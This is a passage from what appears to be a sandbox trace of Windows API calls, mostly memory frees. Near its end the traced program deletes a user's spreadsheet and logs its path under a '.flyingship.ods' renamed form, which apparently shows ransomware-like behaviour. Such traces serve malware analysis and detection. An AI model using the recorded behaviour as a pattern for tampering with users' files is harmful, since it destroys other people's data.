out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0175.757] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0175.758] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0175.758] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.759] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0175.759] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.760] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.760] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0175.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0175.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0175.763] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.763] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc1c8 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0175.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0175.763] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.763] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.763] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.765] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.765] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.765] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.765] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.766] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.766] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0175.766] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.766] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0175.766] FreeLibrary (hLibModule=0x75990000) returned 1 [0175.767] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.767] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.767] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpFilePart=0x0) returned 0x3c [0175.768] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0xe1ecb60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 0x90af58 [0175.769] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\odo7bquezcp1nl2g.ods")) returned 1 [0175.772] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76ffb7c0, ftCreationTime.dwHighDateTime=0x1d5e4c8, ftLastAccessTime.dwLowDateTime=0x4bae3550, ftLastAccessTime.dwHighDateTime=0x1d5e28a, ftLastWriteTime.dwLowDateTime=0xe1ecb60, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xc3fc, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="Odo7BQUeZcP1NL2G.ods", cAlternateFileName="ODO7BQ~1.ODS")) returned 0 [0175.772] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0175.774] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0175.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ds", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ods", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0175.774] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ods", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0175.774] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.775] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.776] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0175.776] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.776] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.776] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0175.776] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x1493, lpOverlapped=0x0) returned 1 [0175.777] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0175.777] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.777] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0175.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0175.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0175.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0175.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0175.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4a) returned 0x923b28 [0175.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\n", cchWideChar=74, lpMultiByteStr=0x923b28, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Odo7BQUeZcP1NL2G.flyingship.ods\r\n", lpUsedDefaultChar=0x0) returned 74 [0175.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0175.777] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0175.777] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0175.777] WriteFile (in: hFile=0x120, lpBuffer=0x923ad0*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923ad0*, lpNumberOfBytesWritten=0x87f43c*=0x49, lpOverlapped=0x0) returned 1 [0175.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0175.778] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0175.778] CloseHandle (hObject=0x120) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0175.779] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 